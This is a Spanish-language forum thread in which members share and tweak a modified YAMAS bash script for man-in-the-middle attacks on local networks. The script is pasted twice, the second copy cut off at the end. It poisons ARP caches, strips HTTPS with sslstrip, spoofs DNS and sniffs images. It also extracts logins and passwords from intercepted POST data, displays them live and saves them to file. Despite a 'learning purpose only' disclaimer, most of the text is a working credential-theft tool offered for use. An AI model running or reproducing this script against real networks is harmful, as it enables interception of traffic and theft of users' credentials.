   1) mkdir $log_output_dir/capture_$(date +%d%m%y) && driftnet -i $iface -a -d $log_output_dir/capture_$(date +%d%m%y)  > /dev/null & driftnet -i $iface &> /dev/null &
      drifton=1 &
      echo "Driftnet launched, the images will be saved in $log_output_dir/capture_$(date +%d%m%y)"
      misc ;;
   2) choose_dns ;;
   3) final ;;
   *) echo "bad choice"
     misc ;;
esac
}

rtparse()
{
echo -e "\n\nIn this menu, you can pause, resume, kill, or launch
realtime parsing (RTP).
1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
2. Resume RTP.
3. Kill RTP (stop and close xterm)
4. Re-launch RTP
5. Previous menu."
read rtp
case $rtp in # not sure if this should be quote enclosed...anyone want to help out?  It's singular options without a space, so I think the need for quotes is NOT needed??
   1) echo -e "\033[33m
  • Pausing...\033[m"

   kill -19 $looparseid
   echo -e "\033[33m[-]Paused.\033[m"
   rtparse;;

   2) echo -e "\033[33m
  • Resuming...\033[m"

   kill -18 $looparseid
   echo -e "\033[33m[-]Resumed.\033[m"
   rtparse;;

   3) echo -e "\033[31m
  • Killing...\033[m"

   kill $looparseid
   echo -e "\033[33m[-]Killed.\033[m"
   rtparse;;

   4) echo -e "\033[32m
  • Launching...\033[m"

   xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$!
   sleep 2
   echo -e "\033[33m[-]Launched.\033[m"
   rtparse;;

   5) echo "Previous"
   final ;;

   *) echo -e "\033[31mBad choice bro !\033[m\n" #Professional Language =)
   rtparse;;
esac
}

final()
{
echo -e "\n\033[32mAttack is running\033[m. You can :
1. Rescan network.
2. Add a target (useless if targeting whole network).
3. Display ASCII correspondence table.
4. Real-time parsing...
5. Misc features.
6. Quit properly.

Enter the number of the desired option."
read final
case $final in
   1) rescan ;;

   2) add_target ;;

   3) ascii ;;

   4) rtparse ;;

   5) misc ;;

   6) cleanup ;;

   *) echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
   final ;;
esac
}

###############################End of functions#############################

# IP forwarding
echo
echo -e "\033[31m
  • Activating IP forwarding... \033[m"

echo "1" > /proc/sys/net/ipv4/ip_forward
echo "[-] Activated."

#Iptables
echo
echo -e "\033[31m
  • Configuring iptables... \033[m"

echo -en "\033[31m To \033[mwhat port should the traffic be redirected to? (default = 8080)"
echo
read -e outport
if [ "$outport" = "" ];then
   outport=8080
   echo -e "Port $outport selected as default.\n"
fi

echo -en "\033[31m From \033[mwhat port should the traffic be redirected to? (default = 80)"
echo
read -e inport
if [ "$inport" = "" ];then
   inport=80
   echo -e "Port $inport selected as default.\n"
fi

echo -e "\n\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
echo "[-] Traffic rerouted"

#Sslstrip
echo
echo -e "\033[31m
  • Activating sslstrip... \033[m"

echo  "Choose filename to output : (default = yamas)"
read -e filename
if [ "$filename" = "" ];then
   filename="yamas"
fi

echo -e "\033[33m Sslstrip will be listening on port $outport and outputting log in /tmp/$filename.txt\033[m"

if [ ! -e '/usr/bin/sslstrip' ];then # If sslstrip isn't installed
   if [ ! -x '$sslstrip_dir/sslstrip.py' ];then #if non-installed is not executable
      chmod +x $sslstrip_dir/sslstrip.py #make it executable
   fi
   $sslstrip_dir/sslstrip.py $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$! #launch non-installed
else
   sslstrip $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
fi

sleep 4 #let time for sslstrip to launch. Might be bit too much, but better prevent than heal.
echo
echo -e " [-] Sslstrip is running." # a bit redundant, but who cares?
echo

#Arpspoofing
echo
echo -e "\033[31m
  • Activating ARP cache poisoning... \033[m"

echo
ip route show | awk '(NR == 1) { print "Gateway :", $3,"    ", "Interface :", $5}' #Output IP route show user-friendly
iface=$(ip route show | awk '(NR == 1) { print $5}')
gateway=$(ip route show | awk '(NR == 1) { print $3}') #store gateway ip
echo
echo "Enter IP gateway adress or press enter to use $gateway."
read -e gateway
if [ "$gateway" = "" ];then
   gateway=$(ip route show | awk '(NR == 1) { print $3}') #restore gateway ip since pressing enter set our var to null
   echo -e "$gateway selected as default.\n"
fi

echo
echo "What interface would you like to use? It should match IP gateway as shown above. Press enter to use $iface."
read -e iface
if [ "$iface" = "" ];then
   iface=$(ip route show | awk '(NR == 1) { print $5}') #store default interface
   echo -e "$iface selected as default.\n"
fi

echo -e "\r"
echo -e "We will target the whole network as default. You can \033[4md\033[miscover hosts and enter IP(s) manually by entering \033[4mD\033[m.
Press enter to default."
read -e choicearp
echo
if [[ $choicearp = "D" || $choicearp = "d" ]];then
   echo -e "\nDo you want to map the network to show live hosts? (Y/N)   [This might take up to 30 secs, be patient]"
   read -e hosts
   echo -e "\033[31m "
   if [[ $hosts = "Y" || $hosts = "y" ]];then
      nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
      echo -e "\033[m " # switch color back to white
   else
      echo -e "\033[m "
   fi
   echo -e "Please enter targets according to usage : IP1 IP2 IP3...
\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network targeting.\033[m "
   arpspoofi()
   { # We launch ARPspoof in different xterm windows to keep script running
   while [ "$1" != "" ];do
      xterm -geometry 90x3-1-1 -T "Poisoning $1" -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
      shift
   done

   echo -e "\033[33m Targeting $parameters on $gateway on $iface with ARPspoof\033[m"
   }

   ettercapi()
   { # We launch ARPspoof in different xterm windows to keep script running
   while [ "$1" != "" ];do
      xterm -geometry 90x3-1-1 -T "Poisoning $1" -e ettercap -o -q -i $iface -T -M arp  /$gateway/ /$1/ 2>/dev/null & sleep 2
      shift
   done

   echo -e "\033[33m Targeting $parameters on $gateway on $iface with Ettercap\033[m"
   }

   read -e parameters
   if [[ "$etter" = "1" ]];then
      ettercapi $parameters
   else
      arpspoofi $parameters
   fi

else
   if [[ "$etter" = "1" ]];then
      xterm -geometry 90x3-1-1 -T ettercap -e ettercap -o -q -i $iface -T -M arp  // // &
      sleep 2
      echo -e "\033[33m Targeting the whole network on $gateway on $iface with Ettercap\033[m"
   else
      xterm -geometry 90x3-1-1 -T arpspoof -e arpspoof -i $iface $gateway &
      sleep 2
      echo -e "\033[33m Targeting the whole network on $gateway on $iface with ARPspoof\033[m"
   fi
fi

echo -e "[-] Arp cache poisoning is launched. \033[31m Keep new window(s) running. \033[m"
echo -e "\n\033[32m Attack should be running smooth, enjoy.\033[m"
echo
echo
echo "looparse(){
while :
do
   clear
   echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
   cat /tmp/$filename.txt |
awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
egrep -i -f '/tmp/grepcred.txt' |
awk -F \"=\" '{if (length(\$2) < 3) print \"\";
else if (\$1 ~/[W]/) print \$0;
else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
else print \"Login = \t\t\", \$2}' |
uniq
sleep 7
done
  }
looparse" > /tmp/looparse.sh #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
chmod +x /tmp/looparse.sh
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$! #here's the beauty
sleep 2
final #call the "final" function. Yes, it's the final one.
### End of the script fellas.
[/spoiler]

El ultimo que has puesto lo miro ahora pero creo que al final hemos hecho lo mismo.
« Última modificación: 28-07-2012, 05:12 (Sábado) por geminis_demon »

La luz cree que viaja más rápido que cualquier otra cosa, pero se equivoca; da lo mismo lo rápido que pueda viajar, porque al final, la luz descubre que la oscuridad ha llegado antes que ella, y la está esperando.

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 14480
Re: wifislax-4.2 32bits con kde 4.8.4 BETA 3
« Respuesta #49 en: 28-07-2012, 05:18 (Sábado) »
tienes el directorio de captura asi

~

yo lo apañe de otra manera.

voy a probar mas a fondo , con varias sesiones..a ver que pasa.

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 14480
Re: wifislax-4.2 32bits con kde 4.8.4 BETA 3
« Respuesta #50 en: 28-07-2012, 05:25 (Sábado) »
mierda , la he cagao...

borre el bueno , ..el code que puse no vale.,,  :'(

otra vez a empezar.

aunque solo he de rectificar lo de las opciones..que me habia quedao bien ,  ¿para que un menu de elegir snifer de imagenes,si solo va el driftnet ?..voy a corregirlo.

Desconectado geminis_demon

  • Colaborador
  • *
  • Mensajes: 2383
  • Prácticas precisas precisan práctica
Re: wifislax-4.2 32bits con kde 4.8.4 BETA 3
« Respuesta #51 en: 28-07-2012, 05:28 (Sábado) »
tienes el directorio de captura asi

~

yo lo apañe de otra manera.

voy a probar mas a fondo , con varias sesiones..a ver que pasa.

~ = carpeta de usuario = en el caso de wifislax /root

Si ejecutas en la terminal "mkdir ~/pepito", veras como se crea el directorio /root/pepito,

eso no hace falta tocarlo, no se si me explico xD








La luz cree que viaja más rápido que cualquier otra cosa, pero se equivoca; da lo mismo lo rápido que pueda viajar, porque al final, la luz descubre que la oscuridad ha llegado antes que ella, y la está esperando.

Desconectado geminis_demon

  • Colaborador
  • *
  • Mensajes: 2383
  • Prácticas precisas precisan práctica
Re: wifislax-4.2 32bits con kde 4.8.4 BETA 3
« Respuesta #52 en: 28-07-2012, 05:32 (Sábado) »
mierda , la he cagao...

borre el bueno , ..el code que puse no vale.,,  :'(

otra vez a empezar.

aunque solo he de rectificar lo de las opciones..que me habia quedao bien ,  ¿para que un menu de elegir snifer de imagenes,si solo va el driftnet ?..voy a corregirlo.

No te comas la cabeza, el que yo he puesto va bien, además yo también le borré el menú ese y lo puse para que directamente empiece a capturar.

Si es que ya te digo que al final habíamos hecho lo mismo xD

La luz cree que viaja más rápido que cualquier otra cosa, pero se equivoca; da lo mismo lo rápido que pueda viajar, porque al final, la luz descubre que la oscuridad ha llegado antes que ella, y la está esperando.

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 14480
Re: wifislax-4.2 32bits con kde 4.8.4 BETA 3
« Respuesta #53 en: 28-07-2012, 05:34 (Sábado) »
 ;D ;D ;D  le puse lo de modified by ..por que le hemos retocado bastante del original.

[spoiler]# #!/bin/bash
# Bash script to launch man it the middle attack and sslstrip.
# version 0.9 by comaX
# Modified by www.seguridadwireless.net

if [ $UID -ne 0 ]; then
    echo -e "\033[31This program must be run as root.
This will probably fail.\033[m"
    sleep 3
    fi

log_output_dir=/root/driftnet
sslstrip_dir=
ask_for_install=n

if [ ! -d "$log_output_dir" ]; then
    mkdir -p $log_output_dir
fi

version="20120213"
# if user ^C then execute cleanup function
trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it may try killing non-existing processes.
fast_cleanup()
{
echo -e "\n\n\033[31m ^C catched. Cleaning up, then exit.\033[m"
if [[ $looparseid != "" ]];then
   kill $looparseid
fi

if [[ $sslstripid != "" ]];then
   kill $sslstripid
fi

if [[ $dnsid != "" ]];then
   kill $dnsid
fi

if [[ $etterspoofid != "" ]];then
kill $etterspoofid
fi

if [[ "$etter" = "1" ]];then
   killall ettercap
else
   killall arpspoof
fi

echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush          # there are probably too many resets here,
iptables --table nat --flush      # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
if [ -e '/tmp/looparse.sh' ]; then
   rm /tmp/looparse.sh
fi

echo -e "\033[32m[-] Clean up successful !\033[m"
exit 0
}

#Let's define some arguments that can be passed to the script :

#generating grepcred.txt so that it doesn't have to be downloaded each time
#it was originally being downloaded so I could easily fix it, but there has
#been no fix to be done... So why use a file instead of a command line ?
#It's just much more easier this way.
echo -e "credential\nemail\nlast\nlog\nmodified\nname\nnickname\npass\npersistent\npw\nsession\ntextbox\nuser\nwebsite" > /tmp/grepcred.txt
while [ "$1" != "" ];do
case $1 in
   -p | --parse)
      if [[ $2 == "" ]]; then
         echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
         exit 0
      fi
clear
   echo -e "Parsing $2 for credentials.\n\n"
   cat $2 |
   awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
   awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
   egrep -i -a -f /tmp/grepcred.txt |
   awk -F "=" '{if (length($2) < 4) print "";
   else if ($1 ~/Website/) print $0;
   else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
   else print "Login = \t"$2}' |
   uniq
   exit 0 ;;
   
   -e | --etter) echo -e "\tYou will be using Ettercap instead of ARPspoof."
   etter="1"
   shift
   sleep 0.5 ;;

   -h | --help) clear
   echo -e "You are running $0, version $version.


usage : $0 -h -c -p -e -s -f
   -h or --help  :   Display this help message, disclaimer and exit.
   -c or --change: Display changelog and todo.   
   -e :   Use ettercap instead of ARPspoof. One might have one's reasons...
         ARPspoof is default.
   -p or --parse :   Only parse the given <file>. Don't use wildcards.
         Use > /output_file to print to a file.
   -s : The script won't download anything. Make sure you have the needed files.
   -f : Use a padlock favicon in sslstrip.
   
\033[31m DISCLAIMER :\033[m
This program is intended for learning purpose only. I do not condone hacking
and wouldn't be held responsible for your actions. Only you would face legal
consequences if you used this script for illegal activities.

\033[31m What I think should be learnt from this script :\033[m
This script should teach you how easy it is to steal sensitive online
credentials and how to protect you from it, provided you understand
what this program does. The best way to understand what it does is
to look at its source. This will also teach you basic shell scripting."
exit 0 ;;

   -c | --change)
   clear
   echo -e "\033[31m Changelog :\033[m
ToDo :
- FakeSSL -> Need help

\033[31mFeatures :\033[m
- Output of credentials as they are sniffed in xterm window.
- Log parsing for user-friendly output.
- Both arpspoof and ettercap are suported
- Network mapping for host discovery.
- Can save \"dumped\" passwords to file.
- Support for multiple targets on the network.
- Can parse a single file.
- Display ASCII tables for better readability of creds.
- All options know default, pressing only enter should get you through.
- Very neat and kewl ascii =D
- Miscellaneous features

\033[31m Credits :\033[m
Credits go to all people on backtrack forums for their help and support,
and google for being my best friend with scripting.
Special kudos to ShortBuss for something I should have seen a
long time ago (sslstrip before arpspoof) and many little improvements.
And of course, to the people responsible for the tools I am using in this script.

Please criticize this program or submit ideas on the official thread at
http://tinyurl.com/yamas-bt5 or send me a mail at contact.comax@gmail.com"
   exit ;;

   -s | --silent)
   echo "silent mode ON"
   silent="1"
   shift ;;

   -f | --fav)
   echo "favicon mode ON"
   fav="-f"
   shift ;;

   *) shift ;;
esac

done

### Message of the day ! <= Fucking useless, but who knows, I might want to warn about something directly, or tell a joke...
if [[ "$silent" = "1" ]]; then
   message="\nNo message to display : you are running in silent mode"
else
   message=$(curl --silent -q http://comax.fr/yamas/bt5/message) #store it to variable
fi

if [[ $1 = "-s" || $2 = "-s" ]]; then
   echo "ASCII tables won't be available."
   echo "ASCII tables are not available due to the use of silent mode." > /tmp/ascii
else
   wget -q http://comax.fr/yamas/bt5/ascii -O /tmp/ascii
fi

### Check for updates !
if [[ "$silent" = "1" ]];then
   echo "Not checking for a new version : silent mode."
else
   changelog=$(curl --silent -q http://comax.fr/yamas/bt5/changelog)
   last_version=$(curl --silent -q http://comax.fr/yamas/bt5/version) #store last version number to variable
   if [[ $last_version > $version ]];then # Comparing to current version
      echo -e "You are running version \033[31m$version\033[m, do you want to update to \033[32m$last_version\033[m? (Y/N)
Last changes are :
$changelog"
      read update
      if [[ $update = Y || $update = y ]];then
         echo "
  • Updating script..."

         wget -q http://comax.fr/yamas/bt5/yamas.sh -O $0
         chmod +x $0
         echo "[-] Script updated !"
         if [[ $0 != '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
            echo -e "Do you want to install it so that you can launch it with \"yamas\" ?"
            read install
            if [[ $install = Y || $install = y ]];then #do not proceed to install if using installed version : updating it already "installed" it over.
               cp $0 /usr/bin/yamas
               chmod +x /usr/bin/yamas
               echo "Script should now be installed, launching yamas !"
               sleep 3
               yamas
               exit 1
            else
               echo "Ok, continuing with updated version..."
               sleep 3
               $0
               exit 1
            fi
         fi
      
      sleep 2
      $0
      exit 1
      else
         echo "Ok, continuing with current version..."
      fi
   else
      echo "No update available"
   fi
fi
### End of update process

### Install process
if [[ ! -e '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
   echo "Script is not installed. Do you want to install it ? (Y/N)"
   read install
   if [[ $install = Y || $install = y ]] ; then
      cp -v $0 /usr/bin/yamas
      chmod +x /usr/bin/yamas
      rm $0
      echo "Script should now be installed. Launching it !"
      sleep 3
      yamas
      exit 1
   else
      echo "Ok, not installing then !"
   fi
else
   echo "Script is installed"
   sleep 1
fi
### End of install process

clear
echo -e "
                                                              
     \`YMM'   \`MM'   db      \`7MMM.     ,MMF'      db       .M\"\"\"bgd
       VMA   ,V    ;MM:       MMMb    dPMM       ;MM:     ,MI    \"Y
        VMA ,V    ,V^MM.      M YM   ,M MM      ,V^MM.    \`MMb.    
         VMMP    ,M  \`MM      M  Mb  M' MM     ,M  \`MM      \`YMMNq.
          MM     AbmmmqMA     M  YM.P'  MM     AbmmmqMA   .     \`MM
          MM    A'     VML    M  \`YM'   MM    A'     VML  Mb     dM
        .JMML..AMA.   .AMMA..JML. \`'  .JMML..AMA.   .AMMA.P\"Ybmmd\" " # <= I love it.
echo -e "===========================================================================
=\033[31m       Welcome to Yet Another MITM Automation Script.\033[m                    =
=\033[31m       Use this tool responsibly, and enjoy!\033[m                             =
=       Feel free to contribute and distribute this script as you please. =
=       Official thread : http://tinyurl.com/yamas-bt5                    =
=       Check out the help (-h) to see new features and informations      =
=       You are running version \033[32m$version\033[m                            =
==========================================================================="
echo -e "\033[36mMessage of the day :\033[m"
echo -e "$message"
echo

# Starting fresh : reset IP forward and iptables
echo -e "\033[31m
  • Cleaning iptables \033[m"

echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[-] Cleaned."

# Defining exit function and other ending features
cleanup()
{
echo
echo -e "\033[31m
  • Killing processes and resetting iptable.\033[m"

kill $sslstripid
kill $looparseid

if [[ $drifton = 1 ]]; #if driftnet was used
      then
     echo -e "\033[31mIMMA KILL THIS DRIFTNET BITCH\033[m" #It's between him and me.
         if [[ ! -e $log_output_dir ]]; #check if destination folder exists, since driftnet won't create one nor save images
        then
        mkdir $log_output_dir #create if needed
         fi
     killall driftnet #kill the unbeliever
     elif [[ $drifton = 2 ]]; #if tcpxtract was used
     then
     killall tcpxtract  #kill it...
fi

if [[ "$etter" = "1" ]];then
   killall ettercap
else
   killall arpspoof
fi

echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush          # there are probably too many resets here,
iptables --table nat --flush      # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
rm /tmp/looparse.sh
echo -e "\033[32m[-] Clean up successful !\033[m"
echo -e "\nDo you want to keep the whole log file for further use or shall we delete it? (Y=keep)"
echo "(If you want to keep it, it will be stored in $log_output_dir/$filename.txt)"
read -e keep
if [[ $keep = "Y" || $keep = "y" ]];then # double brackets because double condition. || signifies "or"
   cp /tmp/$filename.txt $log_output_dir/$filename.txt #moving file
   if [ -f "$log_output_dir/$filename.txt" ]; then #check if it exists
      echo "Log file copied !" #it does
      else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
   fi
else
   echo "Logs not saved"
fi

echo -e "\nDo you want to save passwords to a file? (Y=keep)"
echo "(If you want to keep it, it will be saved in $log_output_dir/$filename.pass.txt)"
read -e keeppd
if [[ $keeppd = "Y" || $keeppd = "y" ]];then # double brackets because double condition. || signifies "or"
   cat /tmp/$filename.txt |
   awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
   awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
   egrep -i -a -f /tmp/grepcred.txt |
   awk -F "=" '{if (length($2) < 4) print "";
   else if ($1 ~/Website/) print $0;
   else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
   else print "Login = \t"$2}' |
   uniq >> $log_output_dir/$filename.pass.txt # >> appends to a potential previous file.
   if [ -f "$log_output_dir/$filename.pass.txt" ]; then #check if it exists
      echo "Passwords saved !" #it does
   else
      echo "Error while saving passwords" #it does not
   fi
else
   echo "Password saving skipped."
fi

rm /tmp/$filename.txt
echo -e "\nTemporary files deleted."
if [[ -f "/usr/bin/yamas" && $ask_for_install != 'y' ]];then #check if script is already installed
   echo -e "\n\n"
   exit 1 #if yes, exit.
else
   echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'yamas' in console? (Y/N)"
   read -e install
      case $install in
      Y | y | yes)
         cp $0 /usr/bin/yamas #copy and rename script
         echo -e "\033[32m Script installed !\033[m" ;;
      *) echo "Script not installed." ;;
      esac
fi

exit 1
}

search=$(ip route show | awk '(NR == 2) { print $1}') #store gateway/24 for whole network mapping to variable
#We put it here in the middle, because it could be used two times, but the gateway shouldn't change,
#so there is no need to do it twice.

rescan ()
{
echo -e "\033[31m"
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discorvey
echo -en "\033[m"
final
}

add_target()
{
echo "Enter a new IP adress to attack :"
read newip
xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e arpspoof -i $iface -t $newip $gateway 2>/dev/null & sleep 2
final
}

ascii()
{
clear
cat /tmp/ascii
rm /tmp/ascii
final
}

dns_spoof()
{

### Make Host function###
   mkhst()
   {
   echo "Enter your redirection list line by line. End with #.
Usage is : 127.0.0.1 foo.bar.com
Wildcards may be used."
   rm ~/hosts_spoof
   while :
   do
      read input
      echo "$input" >> ~/hosts_spoof
      if [[ $input == "#" ]];then
         break
      fi
   done
   }

###EOfunc###
echo "If you already have a host file, enter its path. If you don't, press enter."
read gothost
if [[ $gothost != "" ]];then
   echo "Host file $gothost will be used."
else
   echo -e "We'll make one...\n"
   mkhst
fi

xterm -geometry 90x3-1-1 -T "DNS spoofing" -e dnsspoof -i $iface -f ~/hosts_spoof & dnsid=$!
}

choose_dns()
{
echo "Would you like to use Ettercap 'dns_spoof' plugin or dnsspoof (E/D) ? Press a to abort"
read spoofpgm
case $spoofpgm in
   E) echo "We'll use ettercap. Make sure to have edited /usr/share/ettercap/etter.dns"
   ettercap -D -q -i $iface -T -P dns_spoof & etterspoofid=$! ;;
   
   D) echo "We'll use dnsspoof."
   dns_spoof ;;

   a | A) final ;;

   *) echo "Wrong choice. Please use E or D"
   choose_dns;;
esac

final
}

misc()
{
echo -e "\nHere are the miscellanous features.
1. Image sniffing
2. DNS spoofing
3. Previous menu."
read misc
case $misc in
   1) image_menu
      final ;;
   2) choose_dns ;;
   3) final ;;
   *) echo "bad choice"
     misc ;;
esac
}

image_menu()
{
image_choice=1
case $image_choice in
   1) driftnet -i $iface -d $log_output_dir &> /dev/null &
      drifton=1
      echo "Driftnet launched."
      misc ;;
esac
}

rtparse()
{
echo -e "\n\nIn this menu, you can pause, resume, kill, or launch
realtime parsing (RTP).
1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
2. Resume RTP.
3. Kill RTP (stop and close xterm)
4. Re-launch RTP
5. Previous menu."
read rtp
case $rtp in # not sure if this should be quote enclosed...anyone want to help out?  It's singular options without a space, so I think the need for quotes is NOT needed??
   1) echo -e "\033[33m
  • Pausing...\033[m"

   kill -19 $looparseid
   echo -e "\033[33m[-]Paused.\033[m"
   rtparse;;

   2) echo -e "\033[33m
  • Resuming...\033[m"

   kill -18 $looparseid
   echo -e "\033[33m[-]Resumed.\033[m"
   rtparse;;

   3) echo -e "\033[31m
  • Killing...\033[m"

   kill $looparseid
   echo -e "\033[33m[-]Killed.\033[m"
   rtparse;;

   4) echo -e "\033[32m
  • Launching...\033[m"

   xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$!
   sleep 2
   echo -e "\033[33m[-]Launched.\033[m"
   rtparse;;

   5) echo "Previous"
   final ;;

   *) echo -e "\033[31mBad choice bro !\033[m\n" #Professional Language =)
   rtparse;;
esac
}

final()
{
echo -e "\n\033[32mAttack is running\033[m. You can :
1. Rescan network.
2. Add a target (useless if targeting whole network).
3. Display ASCII correspondence table.
4. Real-time parsing...
5. Misc features.
6. Quit properly.

Enter the number of the desired option."
read final
case $final in
   1) rescan ;;

   2) add_target ;;

   3) ascii ;;

   4) rtparse ;;

   5) misc ;;

   6) cleanup ;;

   *) echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
   final ;;
esac
}

###############################End of functions#############################

# IP forwarding
echo
echo -e "\033[31m
  • Activating IP forwarding... \033[m"

echo "1" > /proc/sys/net/ipv4/ip_forward
echo "[-] Activated."

#Iptables
echo
echo -e "\033[31m
  • Configuring iptables... \033[m"

echo -en "\033[31m To \033[mwhat port should the traffic be redirected to? (default = 8080)"
echo
read -e outport
if [ "$outport" = "" ];then
   outport=8080
   echo -e "Port $outport selected as default.\n"
fi

echo -en "\033[31m From \033[mwhat port should the traffic be redirected to? (default = 80)"
echo
read -e inport
if [ "$inport" = "" ];then
   inport=80
   echo -e "Port $inport selected as default.\n"
fi

echo -e "\n\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
echo "[-] Traffic rerouted"

#Sslstrip
echo
echo -e "\033[31m
  • Activating sslstrip... \033[m"

echo  "Choose filename to output : (default = yamas)"
read -e filename
if [ "$filename" = "" ];then
   filename="yamas"
fi

echo -e "\033[33m Sslstrip will be listening on port $outport and outputting log in /tmp/$filename.txt\033[m"

if [ ! -e '/usr/bin/sslstrip' ];then # If sslstrip isn't installed
   if [ ! -x '$sslstrip_dir/sslstrip.py' ];then #if non-installed is not executable
      chmod +x $sslstrip_dir/sslstrip.py #make it executable
   fi
   $sslstrip_dir/sslstrip.py $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$! #launch non-installed
else
   sslstrip $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
fi

sleep 4 #let time for sslstrip to launch. Might be bit too much, but better prevent than heal.
echo
echo -e " [-] Sslstrip is running." # a bit redundant, but who cares?
echo

#Arpspoofing
echo
echo -e "\033[31m
  • Activating ARP cache poisoning... \033[m"

echo
ip route show | awk '(NR == 1) { print "Gateway :", $3,"    ", "Interface :", $5}' #Output IP route show user-friendly
iface=$(ip route show | awk '(NR == 1) { print $5}')
gateway=$(ip route show | awk '(NR == 1) { print $3}') #store gateway ip
echo
echo "Enter IP gateway adress or press enter to use $gateway."
read -e gateway
if [ "$gateway" = "" ];then
   gateway=$(ip route show | awk '(NR == 1) { print $3}') #restore gateway ip since pressing enter set our var to null
   echo -e "$gateway selected as default.\n"
fi

echo
echo "What interface would you like to use? It should match IP gateway as shown above. Press enter to use $iface."
read -e iface
if [ "$iface" = "" ];then
   iface=$(ip route show | awk '(NR == 1) { print $5}') #store default interface
   echo -e "$iface selected as default.\n"
fi

echo -e "\r"
echo -e "We will target the whole network as default. You can \033[4md\033[miscover hosts and enter IP(s) manually by entering \033[4mD\033[m.
Press enter to default."
read -e choicearp
echo
if [[ $choicearp = "D" || $choicearp = "d" ]];then
   echo -e "\nDo you want to map the network to show live hosts? (Y/N)   [This might take up to 30 secs, be patient]"
   read -e hosts
   echo -e "\033[31m "
   if [[ $hosts = "Y" || $hosts = "y" ]];then
      nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
      echo -e "\033[m " # switch color back to white
   else
      echo -e "\033[m "
   fi
   echo -e "Please enter targets according to usage : IP1 IP2 IP3...
\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network targeting.\033[m "
   arpspoofi()
   { # We launch ARPspoof in different xterm windows to keep script running
   while [ "$1" != "" ];do
      xterm -geometry 90x3-1-1 -T "Poisoning $1" -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
      shift
   done

   echo -e "\033[33m Targeting $parameters on $gateway on $iface with ARPspoof\033[m"
   }

   ettercapi()
   { # We launch ARPspoof in different xterm windows to keep script running
   while [ "$1" != "" ];do
      xterm -geometry 90x3-1-1 -T "Poisoning $1" -e ettercap -o -q -i $iface -T -M arp  /$gateway/ /$1/ 2>/dev/null & sleep 2
      shift
   done

   echo -e "\033[33m Targeting $parameters on $gateway on $iface with Ettercap\033[m"
   }

   read -e parameters
   if [[ "$etter" = "1" ]];then
      ettercapi $parameters
   else
      arpspoofi $parameters
   fi

else
   if [[ "$etter" = "1" ]];then
      xterm -geometry 90x3-1-1 -T ettercap -e ettercap -o -q -i $iface -T -M arp  // // &
      sleep 2
      echo -e "\033[33m Targeting the whole network on $gateway on $iface with Ettercap\033[m"
   else
      xterm -geometry 90x3-1-1 -T arpspoof -e arpspoof -i $iface $gateway &
      sleep 2
      echo -e "\033[33m Targeting the whole network on $gateway on $iface with ARPspoof\033[m"
   fi
fi

echo -e "[-] Arp cache poisoning is launched. \033[31m Keep new window(s) running. \033[m"
echo -e "\n\033[32m Attack should be running smooth, enjoy.\033[m"
echo
echo
echo "looparse(){
while :
do
   clear
   echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
   cat /tmp/$filename.txt |
awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
